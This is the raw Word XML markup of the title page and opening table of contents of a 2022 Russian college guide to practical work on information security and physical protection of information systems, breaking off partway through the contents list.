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45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5">
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ЧАСТНОЕ ОБРАЗОВАТЕЛЬНОЕ УЧРЕЖДЕНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:overflowPunct w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ПРОФЕССИОНАЛЬНОГО ОБРАЗОВАНИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:overflowPunct w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«СТАВРОПОЛЬСКИЙ МНОГОПРОФИЛЬНЫЙ КОЛЛЕДЖ»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:overflowPunct w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3660"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3660"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Методические указания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к практическим работам</w:t>
      </w:r>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> по дисциплине</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Инженерно-технические средства физической защиты объектов информатизации»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="003612F0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для обучающихся по специальности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="003612F0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10.02.05 Обеспечение информационной безопасности автоматизированных систем</w:t>
      </w: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2C1237" w:rsidP="00523CE5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2832735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>328295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="809625" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="21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195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8CF7E" id="Rectangle 171" o:spid="_x0000_s1026" style="position:absolute;margin-left:223.05pt;margin-top:25.85pt;width:63.75pt;height:2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" strokecolor="white"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00523CE5" w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ставрополь, 20</w:t>
      </w:r>
      <w:r w:rsidR="00F505EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009D4A9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> г.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003612F0" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Настоящие 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утвержденным приказом Минобрнауки России от 09.12.2016</w:t>
      </w:r>
      <w:r w:rsidR="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidR="003612F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003E46EF" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003E46EF" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003E46EF" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D4A9F" w:rsidRPr="009D4A9F" w:rsidRDefault="009D4A9F" w:rsidP="009D4A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-144"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D4A9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>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9D4A9F" w:rsidRPr="009D4A9F" w:rsidRDefault="009D4A9F" w:rsidP="009D4A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-144"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D4A9F" w:rsidRPr="009D4A9F" w:rsidRDefault="009D4A9F" w:rsidP="009D4A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-144"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D4A9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рекомендовано к использованию в учебном процессе Методическим советом СМК, протокол № 6 от 26.05.2022 г.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003E46EF" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003E46EF" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="003E46EF" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5"/>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5"/>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5"/>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5"/>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5"/>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5"/>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5"/>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5">
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5">
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5">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Pr="00B45DB0" w:rsidRDefault="00F505EF">
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="4080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="page4"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Содержание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="333" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="00523CE5" w:rsidRDefault="00523CE5">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9610"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc3808609" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа № 1. Теоретические основы информационной безопасности</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808609 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</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10" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа № 2. Принципы построения системы защиты информации</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808610 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</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11" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №3. Классификация угроз информационной безопасности</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808611 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
